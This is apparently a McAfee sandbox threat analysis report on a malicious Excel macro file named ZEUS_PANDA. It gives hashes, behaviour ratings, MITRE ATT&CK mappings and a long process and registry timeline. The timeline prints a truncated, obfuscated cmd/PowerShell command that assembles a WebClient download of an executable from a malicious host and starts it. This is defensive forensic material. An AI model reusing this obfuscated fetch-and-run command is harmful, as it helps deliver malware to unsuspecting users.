Threat Analysis Report: ZEUS - PANDA

McAfee Advanced Threat Defense
| Threat Analysis Report
File Name ZEUS_PANDA.xls Threat Level ⬤ 5 - Very High
Malware Name TYPE_TROJAN Engine GTI File Reputation
File Submitted 2021-04-13 01:35:06 UTC Processing Time 194 seconds
File Size 48,640 bytes Sandbox Replication 180 seconds
Show More Hash Values File Details Environment
MD5 Hash Identifier 4DAD700BEE9467DB3C94D6D4DB648502
SHA-1 Hash Identifier 7277E65AA182D423A6038C787B19E21C18B36B4E
SHA-256 Hash
732301FD5F734582B6248783B6D99CED9D2236AD85CB0CFF3B723C82800D0F94
Identifier
Screenshots 8
Hide hash values
File Type 0 2010
Hide file details
Microsoft Windows 7 Professional Service Pack 1 (build 7601, version 6.1.7601), 64-bit
Windows® Internet Explorer version: 8.0.7601.17514
Microsoft Office version: 2007
PDF Reader version: 11.0
No Flash player installed
Flash player plugin version: 22.0.0.209
Platform Version 4.12.0.7
Detection Package Version 4.12.0.201112
Hide environment
Behavior Classification
Behavior Severity
Hiding, Camouflage, Stealthiness, Detection and Removal Protection ⬤ 5 - Very High
Spawned Powershell Process from Office application ⬤ 5 - Very High
⬤ 1-
Uses the Microsoft Cryptographic APIs
Informational
Set a filter function to supersede the top-level exception handler ( ⬤ 1-

http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx ) Informational
⬤ 1-
Offile file contains VBA code
Informational
⬤ 1-
Created new PE file
Informational
⬤ 1-
Changed the protection attribute of the process
Informational
Spreading ⬤ 5 - Very High
Non-PE sample executed active content by shell application ⬤ 5 - Very High
⬤ 1-
Informational
Exploiting, Shellcode ⬤ 5 - Very High
Detected scripting content embedded in the sample ⬤ 2 - Low
Created and set up new security descriptor for the running process ⬤ 2 - Low
⬤ 1-
Informational
Networking ⬤ 5 - Very High

⬤ 1-
Retrieved the name of the network resource associated with a local device
Informational
⬤ 1-
Informational
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection ⬤ 2 - Low
Updated security descriptor for newly created process ⬤ 2 - Low
Ran Powershell without an interactive shell ⬤ 2 - Low
Created named mutex object ⬤ 2 - Low
Allowed the process to perform system-level actions that were not enabled
⬤ 2 - Low
previously
Allocated and initialized security descriptor for newly created process ⬤ 2 - Low

Retrieved system information such as Processor Architecture,Number ⬤ 1-

Processors,Processor Type Informational
⬤ 1-
Informational
⬤ 1-
Obtained user's logon name
Informational
Disabled attach/detach notifications from dynamic link library ⬤ 1-

Informational
⬤ 1-
Contained long sleep
Informational
⬤ 1-
Altered the processes security descriptors for access control and ownership
Informational
Data spying, Sniffing, Keylogging, Ebanking Fraud ⬤ 2 - Low
Set hook procedure to control system activities ⬤ 2 - Low
⬤ 1-
Informational
⬤ 1-
Enumerated through different files and directories on host system
Informational
⬤ 1-
Contained long sleep
Informational
Persistence, Installation Boot Survival ⬤ 1 - Informational
⬤ 1-
Informational
GTI Web/URL Reputation
Connected Sites: 2
URL Port Reputation Category Name Risk Group Functional Group
INTELIIL.FAITH 80 High Risk Malicious Sites Security Risk/Fraud/Crime
INTELIIL.FAITH/MESE'+$FOS+$MO+$UY+$JI+$OE+$FD+$JIK+$NAW+$MO+$UY+$JI+$OE 80 High Risk Malicious Sites Security Risk/Fraud/Crime
Processes Analyzed
Name Reason Severity
ZEUS_PANDA.xls loaded by MATD Analyzer ⬤ 5 - Very High
cmd.exe executed & loaded by excel ⬤ 5 - Very High
powershell.exe executed by cmd.exe ⬤ 5 - Very High
Timeline Activity
Processes Files Registry Operations Network Operations Multiple Operations

Select Any Area to Zoom In
Z EUS_PANDA.xls
cmd.exe
powers hell.exe
0 3 6 9 12 15 18 21 24
Offset in seconds
Jump to Timeline Details
Techniques Observed (MITRE ATT&CK™ Matrix)
Technique Tactics
Execution through API Execution
Adversary tools may directly use the Windows application programming interface (API)
to execute binaries. Functions such as the Windows API CreateProcess will allow
programs and scripts to start other processes with proper path and argument
parameters.
PowerShell Execution
PowerShell is a powerful interactive command-line interface and scripting environment

included in the Windows operating system. Adversaries can use PowerShell to perform a
number of actions, including discovery of information and execution of code. Examples
include the Start-Process cmdlet which can be used to run an executable and the
Invoke-Command cmdlet which runs a command locally or on a remote computer.
Ran Powershell without an interactive shell ⬤ 2 - Low
User Execution Execution
An adversary may rely upon specific actions by a user in order to gain execution.
This may be direct code execution, such as when a user opens a malicious executable
delivered via Spearphishing Attachment with the icon and apparent extension of a
document file. It also may lead to other execution techniques, such as when a user
clicks on a link delivered via Spearphishing Link that leads to exploitation of a
browser or application vulnerability via Exploitation for Client Execution. While
User Execution frequently occurs shortly after Initial Access it may occur at other
phases of an intrusion, such as when an adversary places a file in a shared directory
or on a user's desktop hoping that a user will click on it.
Offile file contains VBA code ⬤ 1 - Very Low
Scripting Execution, Defense Evasion
Adversaries may use scripts to aid in operations and perform multiple actions that
would otherwise be manual. Scripting is useful for speeding up operational tasks and
reducing the time required to gain access to critical resources. Some scripting
languages may be used to bypass process monitoring mechanisms by directly interacting
with the operating system at an API level instead of calling other programs. Common
scripting languages for Windows include VBScript and PowerShell but could also be in
the form of command-line batch scripts.
Non-PE sample executed active content by shell

⬤ 5 - Very High
application
Detected scripting content embedded in the sample ⬤ 2 - Low
Hooking Persistence, Privilege Escalation, Credential Access
Windows processes often leverage application programming interface (API) functions to

perform tasks that require reusable system resources. Windows API functions are
typically stored in dynamic-link libraries (DLLs) as exported functions.
Set hook procedure to control system activities ⬤ 2 - Low
Obfuscated Files or Information Defense Evasion
Adversaries may attempt to make an executable or file difficult to discover or

analyze by encrypting, encoding, or otherwise obfuscating its contents on the system
or in transit. This is common behavior that can be used across different platforms
and the network to evade defenses.
Uses the Microsoft Cryptographic APIs ⬤ 1 - Very Low
File and Directory Discovery Discovery

Adversaries may enumerate files and directories or may search in specific locations
of a host or network share for certain information within a file system.
Enumerated through different files and directories on

⬤ 1 - Very Low
host system
Network Share Discovery Discovery
Networks often contain shared network drives and folders that enable users to access
file directories on various systems across a network.
Retrieved the name of the network resource

⬤ 1 - Very Low
associated with a local device
System Information Discovery Discovery
An adversary may attempt to get detailed information about the operating system and
hardware, including version, patches, hotfixes, service packs, and architecture.
Retrieved system information such as Processor

⬤ 1 - Very Low
Architecture,Number Processors,Processor Type
Obtained user's logon name ⬤ 1 - Very Low
Timeline Activity Details
Time Offset Event Details
00:00:000 Others Initialized a critical section object and set the spin count for the critical section
File
00:00:000 Operations, Retrieved the full path for the module
miscellaneous
File
00:00:000 Operations, Obtained the path of the Windows system directory
miscellaneous
Process
00:00:000 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous
Process
00:00:016 Operations, Changed the protection attribute of process address: 0x2faf30dc, new attribute: Execute_ReadWrite
miscellaneous
Process
Retrieved information on a specific string in the current activation context
00:00:016 Operations,
miscellaneous
Process
00:00:016 Operations, Changed the protection attribute of process address: 0x2faf30dc, new attribute: Execute_Read
miscellaneous
Registry HKLM\Software\Microsoft\Windows\CurrentVersion
00:00:016
Read CommonFilesDir
Registry
00:00:016 HKLM\Software\Microsoft\Windows\CurrentVersion
Opened
Registry
00:00:172 HKCU\SOFTWARE\Microsoft\Office Test\Special\Perf
Opened
Process
Deactivated the activation context corresponding to the specified cookie
miscellaneous
00:00:250 Others Obtained the system metric or system configuration setting
Process
Queried the activation context
miscellaneous
2fa7368f
Thread
00:00:344
Created
00:00:344 Others Recorded system information
Registry
00:00:344 HKCU\Software\Microsoft\Office\12.0\Excel
Opened
Registry HKCU\Software\Microsoft\Office\12.0\Excel
00:00:344
Read DisableThreadAffinity
{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}
Process
00:00:360
Created
Process
00:00:375 Operations, Obtained the identifier of the thread or process that created the specified window
miscellaneous
File
Operations,
00:00:469 Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
miscellaneous
C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll
Files 20000
00:00:469
Opened 10000000
Registry HKLM\SOFTWARE\Microsoft\Fusion
00:00:469
Read NoClientChecks
C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll
Files 20000
00:00:469
Opened 10000000
Registry HKLM\Software\Microsoft\.NETFramework
00:00:469
Read InstallRoot
Registry
00:00:469 HKLM\Software\Microsoft\.NETFramework\Policy\Upgrades
Opened
Registry
00:00:469 HKLM\Software\Microsoft\.NETFramework
Opened
00:00:469
Read OnlyUseLatestCLR
Registry
00:00:469 HKLM\SOFTWARE\Microsoft\Fusion
Opened
Files 20000
00:00:469
Opened 10000000
Registry
00:00:469 HKCU\Software\Microsoft\.NETFramework
Opened
Files 20000
00:00:469
Opened 10000000
00:00:469
Read UseLegacyV2RuntimeActivationPolicyDefaultValue
Files 20000
00:00:469
Opened 10000000
Registry
Enumerated the values for an open registry key
miscellaneous
Files 20000
00:00:469
Opened 10000000
Files 20000
00:00:469
Opened 10000000
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE.config

Read
Files
00:00:469 Normal
Opened
00:00:469 Files Read C:\Windows\Microsoft.NET\Framework\
00:00:469 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727
File
00:00:469 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous
00:00:532 Others Retrieved the current local date and time
Process
00:00:922 Operations, Install a new hook procedure (type: WH_KEYBOARD)
miscellaneous
Process
00:00:922 Operations, Install a new hook procedure (type: WH_MSGFILTER)
miscellaneous
Process
00:00:938 Operations, Initialized COM library for the current thread and set it in the concurrency mode
miscellaneous
{FA445657-9379-11D6-B41A-00065B83EE53}
Process
00:00:953
Created
File
00:01:016 Operations, Obtained the current directory for the current process
miscellaneous
File
00:01:031 Operations, Searched a directory for the name: C:\Program Files (x86)\Microsoft Office\Office12\xlstart\*.*
miscellaneous
File
00:01:031 Operations, Searched a directory for the name: C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART\*.*
miscellaneous
File
00:01:202 Operations, Searched a directory for the name: C:\gvrlzxvbbk\3968952d-fd5a-4618-bce9-f8b63aaeddc7.xls
miscellaneous
{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
Process
00:01:218
Created
00:01:235 Files Read C:\gvrlzxvbbk\3968952d-fd5a-4618-bce9-f8b63aaeddc7.xls
00:01:360 Others Obtained the current system date and time in in Coordinated Universal Time (UTC) format
Socket
00:01:360 Retrieved the name of the network resource associated with a local device
Activities
File
00:01:406 Operations, Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
miscellaneous
Registry
00:01:702 HKLM\Software\Microsoft\VBA
Opened
Registry HKLM\Software\Microsoft\VBA
00:01:702
Read Vbe6DllPath
Registry
00:01:719 HKCR\Licenses
Opened
00:01:719 Others Retrieved information about a locale specified by a identifier
Registry
00:01:735 HKLM\SOFTWARE\Microsoft\VBA\Monitors
Opened
Registry HKCU\Software\Microsoft\VBA\6.0\Common
00:01:750
Read BreakOnAllErrors
Registry
00:01:750 HKCU\Software\Microsoft\VBA\6.0\Common
Created
00:01:750
Read BackGroundCompile
00:01:750
Read BreakOnServerErrors
00:01:750
Read CompileOnDemand
00:01:750
Read NotifyUserBeforeStateLoss
00:01:750
Read RequireDeclaration
Registry
00:01:766 HKCR\TypeLib
Opened
Registry
00:01:766 HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\9
Opened
Registry Enumerated registry keys

00:01:766
Read
Registry
00:01:766 HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\409
Opened
Registry
00:01:766 HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\0\win32
Opened
Registry
00:01:766 HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\0
Opened
Registry
00:01:766 HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6
Opened
Registry
00:01:766 HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}
Opened
Registry
00:01:906 HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.4
Opened
Registry
00:01:906 HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.4\0\win32
Opened
Registry
00:01:906 HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.4\0
Opened
Registry
00:01:906 HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}
Opened
Registry
00:01:906 HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
Opened
Registry
00:01:906 HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
Opened
Registry
00:01:906 HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
Opened
Registry
00:01:906 HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}
Opened
{88D969EC-8B8B-4C3D-859E-AF6CD158BE0F}
Process
00:02:141
Created
{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
Process
00:02:421
Created
{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
Process
00:02:421
Created
Files
00:02:532 C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\3968952d-fd5a-4618-bce9-f8b63aaeddc7.LNK
Deleted
65001f64
Thread
00:02:578
Created
Files
00:02:609 C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\gvrlzxvbbk.LNK
Deleted
Process cmd.exe /c "pôwêrs^hel^l^.e^xê^ -no^l -no^ni^nt^ -wîndo^ws^ 1 -nopro^file^ -exêcû b^ypa^s^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
00:02:609
Created ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='soqckm
00:02:609
Created ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='soqckm
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
00:02:766
Created ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='soqckmm9cu';$ji='.ex';$pol='em.ne';$oe='
00:02:796
Created ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='2yv4ez
00:02:796
Created ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='2yv4ez
File
miscellaneous
Process
00:02:812 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous
{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}
Process
00:02:828
Created
{90AA3A4E-1CBA-4233-B8BB-535773D48449}
Process
00:02:828
Created
{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
Process
00:02:828
Created
Process
00:02:844 Operations, Initialized COM library for the current thread and set it in the concurrency mode
miscellaneous
{660B90C8-73A9-4B58-8CAE-355B7F55341B}
Process
00:02:844
Created
{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
Process
00:02:844
Created
Process
00:02:984 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous
Registry
00:03:000 HKCU\Software\Policies\Microsoft\Windows\System
Opened
Registry HKCU\Software\Microsoft\Command Processor

00:03:016
Read DelayedExpansion
00:03:016
Read CompletionChar

00:03:016
Read DisableUNCCheck

00:03:016
Read EnableExtensions

00:03:016
Read PathCompletionChar
Registry HKLM\Software\Microsoft\Command Processor

00:03:016
Read AutoRun

00:03:016
Read CompletionChar

00:03:016
Read DefaultColor

00:03:016
Read DelayedExpansion

00:03:016
Read DisableUNCCheck

00:03:016
Read EnableExtensions

00:03:016
Read PathCompletionChar
Process
miscellaneous
00:03:016 Files Read C:\Users\Administrator\Documents

00:03:016
Read DefaultColor
File
Operations,
00:03:016 Searched a directory for the name: C:\Users
miscellaneous

00:03:016
Read AutoRun
Registry
00:03:016 HKLM\Software\Microsoft\Command Processor
Opened
Registry
00:03:016 HKCU\Software\Microsoft\Command Processor
Opened
{1F3427C8-5C10-4210-AA03-2EE45287D668}
Process
00:03:016
Created
File
miscellaneous
{F3364BA0-65B9-11CE-A9BA-00AA004AE837}
Process
00:03:016
Created
File
miscellaneous
File
miscellaneous
File
00:03:016 Operations, Searched a directory for the name: C:\Users\Administrator\Documents
miscellaneous
File
00:03:016 Operations, Searched a directory for the name: C:\Users\Administrator
miscellaneous
00:03:032 Others Retrieved information about a locale specified by a identifier
{DD313E04-FEFF-11D1-8ECD-0000F87A470C}
Process
00:03:032
Created
{603D3801-BD81-11D0-A3A5-00C04FD706EC}
Process
00:03:032
Created
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\powERShell.exe.*
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powERShell.exe
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\system32\powERShell.exe
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\powERShell.exe.*
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\powERShell.exe
miscellaneous
00:03:046 Files Read .
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\powERShell.exe
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powERShell.exe
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\powERShell.exe.*
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powERShell.exe.*
miscellaneous
File
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\powERShell.exe
miscellaneous
File
00:03:046 Operations, Searched a directory for the name: C:\Windows\system32\powERShell.exe.*
miscellaneous
Process powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
00:03:062
Created ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='2yv4ezjzrwg';$ji='.ex';$pol='em.ne';$oe=
{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}
Process
00:03:296
Created
{00021401-0000-0000-C000-000000000046}
Process
00:03:296
Created
File
00:03:328 Operations, Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe
miscellaneous
00:03:328 Others Expanded environment-variable strings and replace them with the values defined for the current use
Registry
00:03:344 HKLM\SOFTWARE\Microsoft\PowerShell
Opened
Registry
00:03:344 HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
Opened
Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:344
Read RuntimeVersion
00:03:344
Read PowerShellVersion
00:03:344
Read ConsoleHostAssemblyName
Registry HKLM\SOFTWARE\Microsoft\PowerShell\1
00:03:344
Read
Registry HKLM\SOFTWARE\Microsoft\Fusion
00:03:359 Read NoClientChecks
Registry
00:03:359 HKLM\Software\Microsoft\.NETFramework
Opened
Registry
00:03:359 HKLM\SOFTWARE\Microsoft\Fusion
Opened
00:03:359 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727
00:03:359 Files Read C:\Windows\Microsoft.NET\Framework\
00:03:359
Read UseLegacyV2RuntimeActivationPolicyDefaultValue
00:03:359
Read OnlyUseLatestCLR
00:03:359
Read InstallRoot
Registry
00:03:359 HKCU\Software\Microsoft\.NETFramework
Opened
File
miscellaneous
Files 20000
00:03:359
Opened 10000000
Files 20000
00:03:359
Opened 10000000
Files 20000
00:03:359
Opened 10000000
Files 20000
00:03:359
Opened 10000000
Files 20000
00:03:359
Opened 10000000
Files 20000
00:03:359
Opened 10000000
Files 20000
00:03:359
Opened 10000000
File
00:03:359 Operations, Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
miscellaneous
Process
miscellaneous
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config
Files Read
00:03:359
Opened Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Files 20000
00:03:375
Opened 10000000
00:03:375
Read DisableConfigCache
Signal
00:03:375 Opened an existing named event object
Objects
00:03:391 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
Files Read
00:03:391
Opened Normal
00:03:391 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Registry
00:03:391 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch
Opened
Registry
00:03:391 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
Opened
Registry
00:03:391 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
Opened
Process
00:03:391 Operations, Determined whether the specified process is running under WOW64
miscellaneous
Process
00:03:391 Operations, Changed the protection attribute of process address: 0x71791fdc, new attribute: Execute_ReadWrite
miscellaneous
Process
00:03:391 Operations, Changed the protection attribute of process address: 0x71791fdc, new attribute: Execute_Read
miscellaneous
Registry HKLM\Software\Microsoft\Fusion
00:03:407
Read NoClientChecks
Registry
00:03:407 HKLM\Software\Microsoft\Fusion
Opened
Registry
00:03:407 HKCU\Software\Microsoft\Fusion
Opened
Memory
00:03:407 Opened a named file-mapping object
Mapped Files
00:03:407
Read LoggingLevel
00:03:407 Others Obtained information about an access token
00:03:407 Others Initialized a new security descriptor
00:03:407 Others Allocated and initialized a security identifier (SID)
Process
00:03:407 Operations, Opened the access token associated with a thread
miscellaneous
Process
00:03:407 Operations, Opened the access token associated with a process
miscellaneous
00:03:407 Others Set information in a security discretionary access control list (DACL)
Registry HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

00:03:407
Read DevOverrideEnable
00:03:407
Read VersioningLog
00:03:407
Read UseLegacyIdentityFormat
Registry
00:03:407 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Opened
00:03:407
Read LogResourceBinds
00:03:407
Read LogFailures
00:03:407
Read ForceLog
00:03:407
Read EnableLog
00:03:407
Read DownloadCacheQuotaInKB
00:03:407
Read DisableMSIPeek
00:03:407
Read CacheLocation
Registry
00:03:407 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
Opened
Registry
00:03:421 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
Opened
71869a9f
Thread
00:03:421
Created
File
00:03:421 Operations, Obtained path of the folder from its CLSID
miscellaneous
Process
00:03:421 Operations, Changed the protection attribute of process address: 0x71792be4, new attribute: Execute_ReadWrite
miscellaneous
Process
Decremented a thread's suspend count
miscellaneous
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config
Files Read
00:03:421
Opened Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch
Files Read
00:03:421
Opened Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config
Files Read
00:03:421
Opened Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch
Files Read
00:03:421
Opened Normal
Registry
00:03:421 HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2969830022-2362906686-2146684197-500
Opened
C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config

Files Read
00:03:421
Opened Normal
Registry
00:03:421 HKLM\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
Opened
Registry
00:03:421 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
Opened
C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch

Files Read
00:03:421
Opened Normal
Signal
00:03:421 global\cordbipcsetupsyncevent_2308
Objects
Registry
00:03:421 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:03:437
Read EvalationData
Registry
00:03:437 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
Opened
Registry
00:03:437 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
Opened
00:03:437
Read ILDependencies
Registry
00:03:437 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
00:03:437
Read NIUsageMask
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
00:03:437
Read ILUsageMask
C:\Windows\assembly\NativeImages_v2.0.50727_32\index127.dat
Files Read
00:03:437 Opened Normal
00:03:437
Read DisplayName
Registry
00:03:437 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
Opened
00:03:437
Read Status
00:03:437
Read NIDependencies
00:03:437
Read ConfigString
00:03:437
Read MissingDependencies
00:03:437
Read MVID
00:03:437
Read ConfigMask
Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:03:437
Read mscorlib,2.0.0.0,,b77a5c561934e089,x86
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:03:437
Read SIG
00:03:437
Read Status
00:03:437
Read Modules
00:03:437
Read LastModTime
00:03:437
Read DisplayName
718f8014
Thread
00:03:437
Created
Registry
00:03:437 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
Opened
Registry
00:03:437 HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
Created
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
00:03:437
Read LatestIndex
File
00:03:469 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
miscellaneous
Process
00:03:484 Operations, Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
miscellaneous
Process
00:03:484 Operations, Queried the activation context
miscellaneous
Process
00:03:500 Operations, Set the priority value for a thread
miscellaneous
{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
Process
00:03:546
Created
Registry
00:03:578 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
Opened
Registry
00:03:578 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
Opened
File
00:03:578 Operations, Retrieved the path of the Windows directory
miscellaneous
C:\Windows\assembly\pubpol17.dat
Files Read
00:03:578
Opened Normal
Registry HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:03:578
Read Latest
00:03:578
Read index17
00:03:578
Read LegacyPolicyTimeStamp
00:03:594
Read System,2.0.0.0,,b77a5c561934e089,MSIL
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:03:594
Read SIG
00:03:594
Read Modules
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
Opened
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:03:594
Read ConfigMask
00:03:594
Read Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL
00:03:594
Read LastModTime
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:03:594
00:03:594
Read System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
00:03:594
Read DisplayName
00:03:594
Read Status
00:03:594
Read Status
00:03:594
Read System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
00:03:594
Read NIDependencies
00:03:594
Read MVID
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:03:594
Read DisplayName
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:03:594
Read Status
00:03:594
Read SIG
00:03:594
Read Modules
00:03:594
Read LastModTime
00:03:594
Read DisplayName
00:03:594
Read ConfigMask
00:03:594
Read ConfigString
00:03:594
Read DisplayName
00:03:594
Read EvalationData
00:03:594
Read ILDependencies
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:03:594
Read Modules
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437
Opened
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:03:594
Read LastModTime
00:03:594
Read Modules
00:03:594
Read SIG
00:03:594
Read Status
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
Opened
00:03:594
Read DisplayName
00:03:594
Read LastModTime
00:03:594
Read DisplayName
00:03:594
Read SIG
00:03:594
Read Status
